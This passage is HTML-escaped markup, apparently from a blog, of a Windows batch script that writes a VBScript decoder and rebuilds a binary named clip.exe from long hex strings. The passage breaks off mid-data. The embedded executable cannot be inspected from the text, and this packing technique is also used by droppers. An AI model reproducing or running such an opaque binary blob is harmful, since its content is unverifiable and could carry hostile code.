-moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;: clip.exe made with BHX by carl0s&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;:&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.Const W=^2&gt;t.vbs&amp;amp;Echo.&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Set&lt;/span&gt;&lt;/a&gt; o=WScript.StdOut&gt;&gt;t.vbs&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4D53434600000000F3370000000000002C000000000000000301010001000000000000"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"004500000001000100006800000000000000006235A0552000636C69702E65786500EC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A9D014A6370068434BED7D7F5C54D5B6F81E18608491191514530B094C2FFE00069061"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"187E08C38FAEE8E0E88C66400883C38430CD9CC368894A03D574E465AFEEBBF776EB96"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"75FB71FB719FEFDE6E5A760BB50B5AF6432DC53425A33A3464A48498E4F9AEB5CF0C0C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"88BDDEE7FDF77D17DB73F6DE67EFB5D75E6BEDF5639F7D4EC5B7ED2081841029244120"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"640F11FFB2C97FFFC7430ABFE98D70F2EA84F767EF912C7D7FF64A4B8D23DA66AF5F6F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AFD8105D59515757CF44AF3347DBD9BAE89ABAE8BCE586E80DF555E685132786C67A61"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"84565994CB8282737DA9E6C03DB94BE9F5CE5C23BD36E696D37B21B9BFA2654B6E31BD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DE9DBB9C5EB7D0EB8A9A4A0BF6BF1EAE7A1D214B255232E795229DAFAE8B0448C22432"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"42564061AA58F7C40DF0A38464A34509CD0710124C4612FD7B4A245A6BB904E897DD44"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0BD144ECAC149B28FDC6EF5D237621DBA0996C1C047710D20F8C786A1221337F86E67B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"268BBCD90638BDE01D64B3E4FAED1732E68D0C5CFB4BBC08ADF032DBEF0FD0BE636155"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"055301F997A5DEB9037C621CDD0EC66D5B6877D82B89770EDB908190565FD32E7BA1DD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5C5B0F0DF7078973A3845B774DBB2547DF2CD21522A87F14E95601B90FC1159B55C0B5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1679045727CAD95B45BA7BE1DA0DE556B8BE0ED7DFFBC1CAC933E6E88B54490BAB6A6B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C9AF752B96E9967A0BCB56E62D5DBA1012D9E068A8B433B4729541B7C27BDF64482AF7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"668DBA1586A2E5CB68DE50B8D4041069FEFFE3BF3EFE3D27E5C5A66EE7BCA66E67A3EC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9C332EE49CF33D480F069F731E6EEE763EBFA4DBC9AEEC769EBBB7DBF96D5EB7F3CE63"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E79CDFFEBEDB59D6F98533B51AEAE65D705AEFEE764E89EF772E98DAEF9C794FB73368"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D7E7CEA407BB9DEA53DDCE5DAA6EA7E7916E67CA13DDCE9E87BA9DB725F53965CBCE39"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"571BBA9D4FA4773BF755763B9BD7F438750F9F73764575391F77743B1F9ED5E5DC01F9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"89006B16C05ED1007060FC7B009707E0FEFD47CE51BC17F69CA8939F3951F7E0C4CEBA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E39F9DA8C3BA94774F3AF7ACE97416C0F50F2F9F70DE7BECB8D330E9146D7F246A56C9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"63B366955C99310B5704697FEE49CADFA99F1FB1FDDE7CCCB67FED71DB6B371FB5BD04"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E92948AF469DB2CDBAFD535BC5CE13B6A37B8FD82E451FB55D5D76C2F6C5D3276C8767"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1FB5FD23EDA8EDA3DF1DB125741EB1C5CB8FDAEE80FC977F3962DBF2EE11DB1D9092DA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8ED8E6BD77D4F6F227476C61C78FD8649B8EDA1E2D3A6AF3D13F2E8A0CAFDEF7A613C9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9419E49AD5ECD359B8246763660AA41042B250AFE5AC00514E826518471CB092F117FF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"16E1B2B411C90BB611784B56E5E7EB56E07A9F40CB9B69EBCD221EB437210B68CF11B8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FE5017121D2C75517DDE4E0C8421765243EAC87A920FD75A62264550AA26F570378E24"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9064B271F87A3BBDC7401B3B5C2BA0F532F8DD0065846584BC7D1C282BA1B6024A0EA8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AF80DE35504B594C0AFF37420F3449984224489815863C83EA86C82D7FCD5F50FC44DD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"47553B9FBBF427ACAFACADB12DB455AD1BDBF5AFE329674E305ACD655662E4CFCC05D2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0991859388C4D516ADE7957184E4BBAE3A1ACE59891029531289AA2DBBECC061FCE384"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"555CAFAB51460C4693A2F9AF08A754DE724AD1FC3C64B1F96968DED2A6687E126D7364"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"272DB14A5E33118B1F43B1E741B8D3EA08355A02A2B16E26D471832D0273CA24444689"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"EDC3F930680FE508287B3A5A06B8834C48BB84E42C632F1B0456A6E79F05D5EC7A470E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4D9462975021522EE60E9804562944F2B4C4FC5D1CD50B0B26E251584DE2ACF8E7E484"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A8DACACBD696EE9713BFE9F5AEDC89E456FDD3AD1B32C0FC8C1CABB4EAD7B4EA5E6E07"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A553C45EB6CA2C6D402DA8D0F37BC008BBCC6D30792C5A25560131ECD0BD831CE9D0BD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"894BA043F72A9A1C37DBD9A13BFC26F4E4C31713D2D256B6960DCCF6848E90992B1E52"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BDCF1F03FB7368144A252506A36AC0A412D4ACCCCD0EB9D94145331A28352B5734DF0F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"99BD681FB98EF876CD01C7CD81575C8D43A4B52054CF86F21F87C3C0BA21CFC456DD90"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: 